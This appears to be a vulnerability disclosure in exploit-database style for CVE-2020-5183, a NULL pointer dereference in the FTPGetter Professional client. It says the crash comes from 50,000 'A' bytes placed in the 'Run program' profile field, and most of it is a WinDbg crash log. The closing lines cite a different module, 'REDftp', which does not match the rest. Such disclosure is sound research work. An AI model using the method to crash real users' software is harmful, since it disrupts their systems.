# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://www.ftpgetter.com/ # Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe # Version: v.5.97.0.223 # Tested on: Windows 7 # CVE : N/A ================================================================== THE BUG : NULL pointer dereference -> DOS crash ================================================================== The FTPGetter Professional v.5.97.0.223 FTP client suffers from a NULL pointer dereference vulnerability via the program not properly handling user input when setting the field "Run program" under profile properties, it triggers when executing the profile. ================================================================== DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183 ================================================================== ... ... ================================================================== WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES ================================================================== (b84.e88): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001 eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe - FTPGetter!Xtermforminitialization$qqrv+0x202d74: 00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll - Failed calling InternetOpenUrl, GLE=12007 FAULTING_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000004 Attempt to read from address 00000004 FAULTING_THREAD: 00000e88 PROCESS_NAME: FTPGetter.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 00000004 READ_ADDRESS: 00000004 FOLLOWUP_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE LAST_CONTROL_TRANSFER: from 00812591 to 00855994 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74 0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971 0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1 0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60 0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186 0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23 0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b 0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357 0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf 0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074 0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7 0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6 0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f 0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7 0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe 0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70 0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74 FOLLOWUP_NAME: MachineOwner MODULE_NAME: FTPGetter IMAGE_NAME: FTPGetter.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74 WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1 Followup: MachineOwner --------- NULL pointer FOLLOWUP_IP: REDftp!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] Stepping into and running eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000 eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 REDftp!GetFTPValidationW+0x6e842: 004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=???????? ================================================================== CVE-2020-5183 is a NULL pointer dereference vulnerability ==================================================================